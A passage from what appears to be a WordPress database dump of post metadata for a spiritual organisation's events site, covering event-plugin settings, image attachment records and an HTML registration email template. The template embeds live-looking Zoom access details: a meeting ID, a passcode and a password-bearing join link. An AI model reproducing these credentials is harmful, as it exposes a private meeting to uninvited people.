/>\r\n%%blog_name%%</p>\";}}'),(195807,269392,'passster_activate_global_protection',''),(195808,269392,'passster_activate_protection',''),(195809,269392,'passster_protection_type','password'),(195810,269392,'boldgrid_in_page_containers','1'),(195811,269392,'_dp_original','267696'),(195812,269392,'passster_area_shortcode',''),(195813,269392,'_wp_old_date','2023-01-14'),(195814,269392,'mec_cost_auto_calculate','0'),(195815,269392,'mec_style_per_event','global'),(195816,269392,'mec_trailer_url',''),(195817,269392,'mec_trailer_title',''),(195818,269392,'mec_start_datetime','2023-12-06 07:00 PM'),(195819,269392,'mec_end_datetime','2023-12-06 08:00 PM'),(195820,269392,'mec_sequence','18'),(195821,269392,'mec_event_gallery','a:0:{}'),(195822,269392,'mec_related_events','a:0:{}'),(195823,269392,'mec_banner','a:0:{}'),(195824,269392,'_edit_lock','1700233024:15'),(195825,269392,'_edit_last','15'),(195826,269392,'_thumbnail_id','269394'),(195827,269394,'_wp_attached_file','2023/11/Relationships2.webp'),(195828,269394,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:27:\"2023/11/Relationships2.webp\";s:8:\"filesize\";i:32014;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Relationships2-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Relationships2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5220;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"Relationships2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13272;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:27:\"Relationships2-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24112;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"Relationships2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19186;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"Relationships2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14738;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"Relationships2-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15536;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195829,269395,'_wp_attached_file','2023/11/streaming-web-promo-1.jpg'),(195830,269395,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:801;s:6:\"height\";i:445;s:4:\"file\";s:33:\"2023/11/streaming-web-promo-1.jpg\";s:8:\"filesize\";i:78943;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-350x194.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18360;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8799;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-768x427.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59844;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26596;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58591;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36195;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26859;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"streaming-web-promo-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31268;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195831,269395,'original-file','2023/11/streaming-web-promo-1-updraft-pre-smush-original.jpg'),(195832,269395,'smush-complete','1'),(195833,269395,'smush-info','The file was compressed from 77.09 KB to 66.90 KB, saving 13.22 percent, using WP-Optimize'),(195834,269395,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:78943;s:12:\"smushed-size\";i:68509;s:15:\"savings-percent\";d:13.2200000000000006394884621840901672840118408203125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:78943;s:10:\"compressed\";i:68509;}s:6:\"medium\";a:2:{s:8:\"original\";i:18360;s:10:\"compressed\";i:17273;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8799;s:10:\"compressed\";i:8504;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:59844;s:10:\"compressed\";i:56372;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:26596;s:10:\"compressed\";i:24892;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:58591;s:10:\"compressed\";i:53796;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36195;s:10:\"compressed\";i:34253;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:26859;s:10:\"compressed\";i:25642;}s:8:\"tileview\";a:2:{s:8:\"original\";i:31268;s:10:\"compressed\";i:29099;}}}'),(195835,269402,'_wp_attached_file','2023/11/winter-misty-trees-2.jpg'),(195836,269402,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"2023/11/winter-misty-trees-2.jpg\";s:8:\"filesize\";i:563552;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16863;}s:5:\"large\";a:5:{s:4:\"file\";s:33:\"winter-misty-trees-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129336;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5525;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73514;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18929;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49195;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33028;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22614;}s:8:\"tileview\";a:5:{s:4:\"file\";s:32:\"winter-misty-trees-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22550;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:33:\"winter-misty-trees-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:283619;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195837,269402,'original-file','2023/11/winter-misty-trees-2-updraft-pre-smush-original.jpg'),(195838,269402,'smush-complete','1'),(195839,269402,'smush-info','The file was compressed from 550.34 KB to 504.57 KB, saving 8.32 percent, using WP-Optimize'),(195840,269402,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:563552;s:12:\"smushed-size\";i:516675;s:15:\"savings-percent\";d:8.32000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:563552;s:10:\"compressed\";i:516675;}s:6:\"medium\";a:2:{s:8:\"original\";i:16863;s:10:\"compressed\";i:16665;}s:5:\"large\";a:2:{s:8:\"original\";i:129336;s:10:\"compressed\";i:126728;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5525;s:10:\"compressed\";i:5525;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:73514;s:10:\"compressed\";i:71994;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18929;s:10:\"compressed\";i:18636;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:49195;s:10:\"compressed\";i:48494;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33028;s:10:\"compressed\";i:32474;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22614;s:10:\"compressed\";i:22362;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22550;s:10:\"compressed\";i:22145;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:283619;s:10:\"compressed\";i:276723;}}}'),(195841,269403,'_wp_attached_file','2023/11/meetup-img-1-11-3-2023.jpg'),(195842,269403,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:359;s:6:\"height\";i:180;s:4:\"file\";s:34:\"2023/11/meetup-img-1-11-3-2023.jpg\";s:8:\"filesize\";i:23842;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"meetup-img-1-11-3-2023-350x175.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18546;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"meetup-img-1-11-3-2023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9245;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:34:\"meetup-img-1-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18601;}s:8:\"tileview\";a:5:{s:4:\"file\";s:34:\"meetup-img-1-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18601;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195843,269404,'_wp_attached_file','2023/11/newsletter-img-2-11-3-2023.jpg'),(195844,269404,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:359;s:6:\"height\";i:180;s:4:\"file\";s:38:\"2023/11/newsletter-img-2-11-3-2023.jpg\";s:8:\"filesize\";i:25786;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"newsletter-img-2-11-3-2023-350x175.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18926;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"newsletter-img-2-11-3-2023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8826;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"newsletter-img-2-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19256;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"newsletter-img-2-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19256;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195845,269405,'_wp_attached_file','2023/11/freebooks-img-5-11-3-2023.jpg'),(195846,269405,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:360;s:6:\"height\";i:180;s:4:\"file\";s:37:\"2023/11/freebooks-img-5-11-3-2023.jpg\";s:8:\"filesize\";i:22244;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"freebooks-img-5-11-3-2023-350x175.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16871;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"freebooks-img-5-11-3-2023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7153;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:37:\"freebooks-img-5-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17459;}s:8:\"tileview\";a:5:{s:4:\"file\";s:37:\"freebooks-img-5-11-3-2023-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17459;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195847,269403,'original-file','2023/11/meetup-img-1-11-3-2023-updraft-pre-smush-original.jpg'),(195848,269403,'smush-complete','1'),(195849,269403,'smush-info','The file was compressed from 23.28 KB to 20.37 KB, saving 12.53 percent, using WP-Optimize'),(195850,269403,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:23842;s:12:\"smushed-size\";i:20855;s:15:\"savings-percent\";d:12.5299999999999993605115378159098327159881591796875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:23842;s:10:\"compressed\";i:20855;}s:6:\"medium\";a:2:{s:8:\"original\";i:18546;s:10:\"compressed\";i:17602;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9245;s:10:\"compressed\";i:9105;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18601;s:10:\"compressed\";i:17680;}}}'),(195851,269404,'original-file','2023/11/newsletter-img-2-11-3-2023-updraft-pre-smush-original.jpg'),(195852,269404,'smush-complete','1'),(195853,269404,'smush-info','The file was compressed from 25.18 KB to 18.94 KB, saving 24.8 percent, using WP-Optimize'),(195854,269404,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25786;s:12:\"smushed-size\";i:19390;s:15:\"savings-percent\";d:24.800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:25786;s:10:\"compressed\";i:19390;}s:6:\"medium\";a:2:{s:8:\"original\";i:18926;s:10:\"compressed\";i:17187;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8826;s:10:\"compressed\";i:8236;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19256;s:10:\"compressed\";i:16862;}}}'),(195855,269405,'original-file','2023/11/freebooks-img-5-11-3-2023-updraft-pre-smush-original.jpg'),(195856,269405,'smush-complete','1'),(195857,269405,'smush-info','The file was compressed from 21.72 KB to 18.56 KB, saving 14.54 percent, using WP-Optimize'),(195858,269405,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:22244;s:12:\"smushed-size\";i:19009;s:15:\"savings-percent\";d:14.53999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:22244;s:10:\"compressed\";i:19009;}s:6:\"medium\";a:2:{s:8:\"original\";i:16871;s:10:\"compressed\";i:15759;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7153;s:10:\"compressed\";i:6717;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:17459;s:10:\"compressed\";i:16212;}}}'),(195859,268667,'mec_icons','a:14:{s:12:\"location-pin\";s:0:\"\";s:10:\"map-marker\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:8:\"calendar\";s:0:\"\";s:5:\"clock\";s:0:\"\";s:7:\"clock-o\";s:0:\"\";s:6:\"wallet\";s:0:\"\";s:4:\"user\";s:0:\"\";s:9:\"magnifier\";s:0:\"\";s:11:\"credit-card\";s:0:\"\";s:3:\"map\";s:0:\"\";s:3:\"pin\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:10:\"microphone\";s:0:\"\";}'),(195860,268667,'icons','a:14:{s:12:\"location-pin\";s:0:\"\";s:10:\"map-marker\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:8:\"calendar\";s:0:\"\";s:5:\"clock\";s:0:\"\";s:7:\"clock-o\";s:0:\"\";s:6:\"wallet\";s:0:\"\";s:4:\"user\";s:0:\"\";s:9:\"magnifier\";s:0:\"\";s:11:\"credit-card\";s:0:\"\";s:3:\"map\";s:0:\"\";s:3:\"pin\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:10:\"microphone\";s:0:\"\";}'),(195884,269412,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195885,269412,'mec_certain_weekdays','a:0:{}'),(195886,269412,'mec_allday','0'),(195887,269412,'one_occurrence','0'),(195888,269412,'mec_hide_time','0'),(195889,269412,'mec_hide_end_time','0'),(195890,269412,'mec_comment',''),(195891,269412,'mec_timezone','global'),(195892,269412,'mec_countdown_method','global'),(195893,269412,'mec_public','1'),(195894,269412,'mec_start_date','2023-12-10'),(195895,269412,'mec_start_time_hour','10'),(195896,269412,'mec_start_time_minutes','30'),(195897,269412,'mec_start_time_ampm','AM'),(195898,269412,'mec_start_day_seconds','37800'),(195899,269412,'mec_end_date','2023-12-10'),(195900,269412,'mec_end_time_hour','11'),(195901,269412,'mec_end_time_minutes','30'),(195902,269412,'mec_end_time_ampm','AM'),(195903,269412,'mec_end_day_seconds','41400'),(195904,269412,'mec_repeat_status','0'),(195905,269412,'mec_repeat_type',''),(195906,269412,'mec_repeat_interval','1'),(195907,269412,'mec_repeat_end',''),(195908,269412,'mec_repeat_end_at_occurrences','9'),(195909,269412,'mec_repeat_end_at_date',''),(195910,269412,'mec_advanced_days','a:0:{}'),(195911,269412,'mec_in_days',''),(195912,269412,'mec_not_in_days',''),(195913,269412,'mec_hourly_schedules','a:0:{}'),(195914,269412,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195915,269412,'mec_tickets','a:1:{i:1;a:21:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:12:\"category_ids\";a:0:{}s:2:\"id\";i:1;}}'),(195916,269412,'mec_fees_global_inheritance','1'),(195917,269412,'mec_fees','a:0:{}'),(195918,269412,'mec_ticket_variations_global_inheritance','1'),(195919,269412,'mec_ticket_variations','a:0:{}'),(195920,269412,'mec_reg_fields_global_inheritance','1'),(195921,269412,'mec_reg_fields','a:0:{}'),(195922,269412,'mec_bfixed_fields','a:0:{}'),(195923,269412,'mec_op','a:0:{}'),(195924,269412,'mec_fields','a:0:{}'),(195925,269412,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5404:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; 